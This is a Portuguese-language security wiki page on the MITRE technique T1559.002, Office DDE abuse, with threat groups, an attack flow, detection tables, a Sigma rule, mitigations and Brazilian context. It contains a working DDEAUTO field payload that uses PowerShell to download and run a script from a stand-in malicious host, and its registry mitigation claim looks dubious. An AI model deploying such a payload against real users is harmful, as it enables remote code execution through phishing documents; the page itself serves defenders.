t1559-002-dynamic-data-exchange

# T1559.002 - Inter-Process Commúnication: Dynamic Data Exchange > [!danger] Execução via DDE em documentos Office > Adversarios abusam do protocolo Dynamic Data Exchange (DDE) em documentos Microsoft Office para executar comandos arbitrarios no sistema da vitima sem necessidade de macros VBA, contornando controles de segurança tradicionais. ## Visão Geral **Dynamic Data Exchange (DDE)** e um protocolo legado da Microsoft que permite a comunicação inter-processo e troca de dados entre aplicações Windows. Adversarios exploram campos DDE em documentos Word, Excel e Outlook para executar comandos arbitrarios quando a vitima abre o documento e aceita os prompts de atualização de campo. Diferente de macros VBA, DDE não requer habilitacao explicita pelo usuario alem de aceitar dialogos aparentemente inofensivos. A técnica [[t1559-002-dynamic-data-exchange|T1559.002]] foi amplamente utilizada por grupos como [[g0007-apt28|APT28]], [[g0069-mango-sandstorm|MuddyWater]] e [[ta505|TA505]] em campanhas de [[t1566-001-spearphishing-attachment|spear-phishing]]. O grupo [[g0007-apt28|APT28]] (Fancy Bear) utilizou documentos com DDE em ataques contra organizacoes governamentais e militares europeias, enquanto [[g0069-mango-sandstorm|MuddyWater]] empregou a técnica extensivamente em campanhas contra alvos no Oriente Medio e, ocasionalmente, na América Latina. O DDE apresenta vantagens operacionais significativas para o atacante: não depende de macros (que sao frequentemente bloqueadas por politicas corporativas), funciona em documentos Word e Excel sem necessidade de conteudo ativo habilitado, e os alertas apresentados ao usuario sao genericos o suficiente para serem ignorados. A Microsoft desabilitou DDE por padrao no Word a partir de dezembro de 2017 (patch KB4011574), mas muitas organizacoes ainda executam versoes antigas ou não aplicaram o patch. No Brasil, ataques baseados em documentos Office continuam sendo um vetor primario de comprometimento, especialmente em campanhas direcionadas a setores [[financial|financeiro]] e [[government|governamental]], onde o uso de documentos Word e Excel e onipresente nas operações diarias. ## Attack Flow ```mermaid graph TB A["📧 Delivery Spear-phishing com documento Office"] B["📄 User Interaction Vitima abre documento e aceita prompt DDE"] C["🔴 Execution DDE invoca cmd.exe ou PowerShell"] D["⬇️ Download Payload de segundo estagio baixado"] E["🔗 C2 Conexão com servidor de comando"] F["🕵️ Actions Reconhecimento e movimentação lateral"] A --> B --> C --> D --> E --> F classDef neutral fill:#3498db,stroke:#2980b9,color:#ecf0f1 classDef current fill:#e74c3c,stroke:#c0392b,color:#ecf0f1,stroke-width:3px class A,B neutral class C current class D,E,F neutral ``` **Legenda:** [[t1566-001-spearphishing-attachment|T1566.001]] (Delivery) - **T1559.002 (Execution)** - [[t1105-ingress-tool-transfer|T1105]] (Download) - [[t1071-application-layer-protocol|T1071]] (C2) ## Como Funciona ### Mecanismo DDE em Word O atacante insere um campo DDE no documento Word que referência uma aplicação externa. Quando a vitima abre o documento, o Office pergunta se deseja atualizar os campos vinculados. Se aceitar, o comando e executado. Exemplo de payload DDE em um campo Word: ``` {DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://malicious[.]com/payload.ps1')"} ``` ### Fluxo de execução 1. Vitima recebe e-mail com documento Office anexo 2. Ao abrir, Word/Excel exibe prompt generico de atualização de links 3. Usuario aceita o prompt (habito comum em ambientes corporativos) 4. Campo DDE invoca `cmd.exe` ou `powershell.exe` 5. Script de segundo estagio e baixado e executado 6. Backdoor ou RAT e instalado ### Variantes | Variante | Aplicação | Detalhes | |----------|-----------|----------| | DDEAUTO | Word | Execução automatica ao abrir | | DDE em celula | Excel | Formula que invoca processo externo | | DDE em Outlook | Outlook | Execução via preview de e-mail | | OLE + DDE | Word/Excel | Combinacao com objetos OLE | ## Detecção | Fonte de dados | Método | Eficacia | |----------------|--------|----------| | [[ds0009-process\|Process Creation]] | Processos filhos de WINWORD.exe, EXCEL.exe executando cmd/powershell | Alta | | [[ds0012-script\|Script Execution]] | Monitorar execução de PowerShell originada de processos Office | Alta | | [[ds0022-file\|File Creation]] | Arquivos criados por processos Office em locais incomuns | Media | | [[ds0017-command\|Command Execution]] | Linhas de comando suspeitas com encodings base64 via Office | Alta | | Análise de documentos | Inspecionar campos DDE em documentos antes de abrir | Media | ### Regra Sigma ```yaml title: DDE Execution - Office Application Spawning Suspicious Process id: runk-t1559002-dde status: experimental description: Detecta execução de DDE quando aplicações Office iniciam processos suspeitos references: - https://attack.mitre.org/techniques/T1559/002/ logsource: category: process_creation product: windows detection: selection_parent: ParentImage|endswith: - '\WINWORD.EXE' - '\EXCEL.EXE' - '\OUTLOOK.EXE' - '\POWERPNT.EXE' selection_child: Image|endswith: - '\cmd.exe' - '\powershell.exe' - '\pwsh.exe' - '\mshta.exe' - '\wscript.exe' - '\cscript.exe' - '\certutil.exe' - '\regsvr32.exe' condition: selection_parent and selection_child falsepositives: - Macros VBA legitimas que invocam processos do sistema - Add-ins Office com funcionalidade de sistema level: high tags: - attack.execution - attack.t1559.002 ``` ## Mitigação - **Desabilitar DDE no Word** - aplicar registry key `EnableLinkedConnections = 0` e patch KB4011574 em todos os endpoints - **Desabilitar atualização automatica de links** - configurar Group Policy para impedir atualização automatica de campos DDE - **Regras ASR (Attack Surface Reduction)** - habilitar regra ASR do Microsoft Defender que bloqueia processos filhos de aplicações Office - **Treinamento de usuarios** - educar sobre riscos de aceitar prompts de atualização de campos em documentos - **Gateway de e-mail** - inspecionar anexos Office em busca de campos DDE antes da entrega - **Application Control** - restringir execução de `cmd.exe` e `powershell.exe` como filhos de processos Office via AppLocker ou WDAC Mitigacoes MITRE relacionadas: [[m1040-behavior-prevention-on-endpoint\|M1040]] - [[m1042-disable-or-remove-feature-or-program\|M1042]] ## Relevância LATAM/Brasil > [!latam] Contexto Regional > O uso extensivo de documentos Office no setor corporativo brasileiro torna DDE um vetor de ataque particularmente eficaz na regiao. Fatores que amplificam o risco no Brasil e América Latina: - **Dependência de Office** - o ecossistema corporativo brasileiro e fortemente dependente de Microsoft Office, com grande volume de documentos trocados diariamente por e-mail - **Patch gap** - muitas organizacoes de medio porte no Brasil ainda não aplicaram o patch que desabilita DDE por padrao, especialmente em versoes Office 2013 e 2016 - **Banking trojans** - campanhas de malware bancario brasileiro (Grandoreiro, Guildma) historicamente utilizaram documentos Office como vetor inicial, incluindo variantes com DDE - **Setor público vulnerável** - orgaos governamentais frequentemente operam com versoes desatualizadas do Office, sem politicas ASR configuradas - **Phishing em portugues** - campanhas de DDE direcionadas ao Brasil utilizam temas como notas fiscais eletronicas (NFe), boletos e comúnicados da Receita Federal ## Referências - [MITRE ATT&CK - T1559.002](https://attack.mitre.org/techniques/T1559/002/) - [Microsoft - Disabling DDE Feature in Office](https://docs.microsoft.com/en-us/security-updates/) - [SensePost - DDE Payloads in Office Documents](https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/) - [SANS ISC - DDE Attack Analysis](https://isc.sans.edu/)